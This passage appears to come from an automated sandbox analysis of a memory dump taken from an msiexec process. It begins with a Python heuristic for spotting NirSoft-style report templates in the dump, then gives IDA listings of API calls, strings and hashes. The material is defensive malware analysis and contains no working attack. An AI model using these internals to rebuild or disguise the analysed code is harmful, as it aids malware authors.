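                pos = dump.find(needle, pos + 1)
    return sorted(hits)


def looks_like_nirsoft_report_writer(dump: bytes, min_distinct: int = 3) -> bool:
    """Verdict: at least min_distinct of the four template strings present."""
    distinct = {text for _, _, text in find_template_strings(dump)}
    return len(distinct) >= min_distinct


def build_sample_dump() -> bytes:
    """Constructed dump: 0x100 bytes of padding, the four strings as
    NUL-terminated UTF-16LE with gaps, and one copy of the table tag as ANSI."""
    buf = bytearray(b"\x00" * 0x100)
    for text in NIRSOFT_TEMPLATE_STRINGS:
        buf += text.encode("utf-16le") + b"\x00\x00"
        buf += b"\x00" * 16
    buf += NIRSOFT_TEMPLATE_STRINGS[2].encode("ascii") + b"\x00"
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample_dump()
    for va, enc, text in find_template_strings(sample):
        print(f"{va:08x}  {enc:8}  {text[:48]}")
    print("NirSoft report writer present:", looks_like_nirsoft_report_writer(sample))
```

To run it against the real region, replace `build_sample_dump()` with the bytes of the `.sdmp` file named in the Memory Dump Source line; the reported virtual addresses should then be compared with the xrefs above (the xrefs are the code references, so the string data itself will sit elsewhere in the image). Requiring three of the four strings rather than all four keeps the check tolerant of a partially paged-out or truncated dump without firing on a lone `<!DOCTYPE>` line, which many unrelated binaries carry.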
APIs
• wcschr.MSVCRT ref: 00413972
• wcscpy.MSVCRT ref: 00413982
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
• wcscpy.MSVCRT ref: 004139D1
• wcscat.MSVCRT ref: 004139DC
• memset.MSVCRT ref: 004139B8
  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
• memset.MSVCRT ref: 00413A00
• memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
• wcscat.MSVCRT ref: 00413A27
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
• Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
• Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
• Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
• Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4019544885-1856150674
• Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
• Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
• Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
• Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
• Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
• Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
APIs
• memset.MSVCRT ref: 004082EF
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memset.MSVCRT ref: 00408362
• memset.MSVCRT ref: 00408377
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ByteCharMultiWide
• String ID:
• API String ID: 290601579-0
• Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
• Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
• Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
• Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
• Opcode ID: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
• Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
• Opcode Fuzzy Hash: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
• Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
APIs
• memset.MSVCRT ref: 0040A47B
• _snwprintf.MSVCRT ref: 0040A4AE
• wcslen.MSVCRT ref: 0040A4BA
• memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
• wcslen.MSVCRT ref: 0040A4E0
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)$YV@
• API String ID: 3979103747-598926743
• Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
• Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
• Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
• Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                                                                                                                          • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                                          • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                          • String ID: ($d
                                                                                                                                                                                                          • API String ID: 1140211610-1915259565
                                                                                                                                                                                                          • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• String ID:
• API String ID: 3015003838-0
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
• memset.MSVCRT ref: 00413ADC
• memset.MSVCRT ref: 00413AEC
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
• memset.MSVCRT ref: 00413BD7
• wcscpy.MSVCRT ref: 00413BF8
• CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID: 3A
• API String ID: 3300951397-293699754
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
APIs
• memset.MSVCRT ref: 0041249C
• ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
• ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
• GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
• LoadIconW.USER32(00000000,00000065), ref: 0041258B
• wcscpy.MSVCRT ref: 004125A0
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
• FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
APIs
• memset.MSVCRT ref: 00411AF6
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 00411B14
• wcscat.MSVCRT ref: 00411B2E
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: AE$.cfg$General$EA
• API String ID: 776488737-1622828088
APIs
• memset.MSVCRT ref: 0040D8BD
• GetDlgCtrlID.USER32(?), ref: 0040D8C8
• GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
• memset.MSVCRT ref: 0040D906
• GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
• _wcsicmp.MSVCRT ref: 0040D92F
  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
APIs
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• memset.MSVCRT ref: 0041BA3D
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
• memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
• memcpy.MSVCRT(?,?,00000040), ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
• memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
